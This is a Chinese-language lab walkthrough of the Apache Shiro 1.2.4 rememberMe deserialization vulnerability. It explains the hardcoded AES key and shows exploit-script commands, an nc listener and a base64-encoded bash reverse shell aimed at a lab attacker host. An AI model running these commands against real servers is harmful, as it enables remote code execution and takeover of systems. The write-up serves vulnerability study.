1.漏洞描述

Apache Shiro是一款开源安全框架，提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用，同时也能提供健壮的安全性。

Apache Shiro 1.2.4及以前版本中，加密的用户信息序列化后存储在名为remember-me的cookie中。攻击者可以使用Shiro的默认密钥伪造用户cookie，触发Java反序列化漏洞，进而在目标机器上执行任意命令。

2.漏洞简单分析

Shiro提供了一种下次访问时无需再登录就可访问的功能，即“记住我”功能。Shiro对rememberMe的字段做了加密处理，在cookieRememberMeManaer类中将cookie的字段依次进行序列化->AES加密->base64编码。当需要识别用户身份时，会对cookie中rememberMe字段进行解密，其顺序依次为base64解码->解密AES->反序列化。

在这个过程中，我们发现AES密钥非常关键，但很不幸，密钥被硬编码到了代码中，也就意味着使用shiro组件的业务，其默认的AES密钥都是一样的。因此，攻击者可以构造一个恶意对象，并且进行序列化->AES加密->base64编码后，作为cookie中rememberMe字段进行发送，Shiro将收到的rememberMe字段进行解码、AES解密、反序列化后，最终执行了一个恶意代码，造成反序列化漏洞。

3.漏洞验证

3.1 使用shiro_exploit.py进行利用，尝试写入文件jason123.txt

python shiro_exploit.py -t 3 -u http://192.168.233.134:8080 -p "touch jason123.txt"

3.2 登陆到目标靶机，发现文件成功写入，说明漏洞存在。

4.深度利用

4.1 尝试深度利用，在kali服务器上使用nc监听6666端口

nc -lvp 6666

4.2 使用base64编码进行加密，保证命令成功执行，防止参数被类破坏。

https://jackson-t.ca/runtime-exec-payloads.html

4.3 使用exp执行反弹shell

python shiro_exploit.py -t 3 -u http://192.168.233.134:8080 -p "bash -c {echo,"YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIzMy4xMzEvNjY2NiAwPiYx"}|{base64,-d}|{bash,-i}"

4.4 成功获取shell，反弹成功

免责声明

严禁读者利用以上介绍知识点对网站进行非法操作 , 本文仅用于技术交流和学习 , 如果您利用文章中介绍的知识对他人造成损失 , 后果由您自行承担 , 如果您不能同意该约定 , 请您务必不要阅读该文章 , 感谢您的配合 !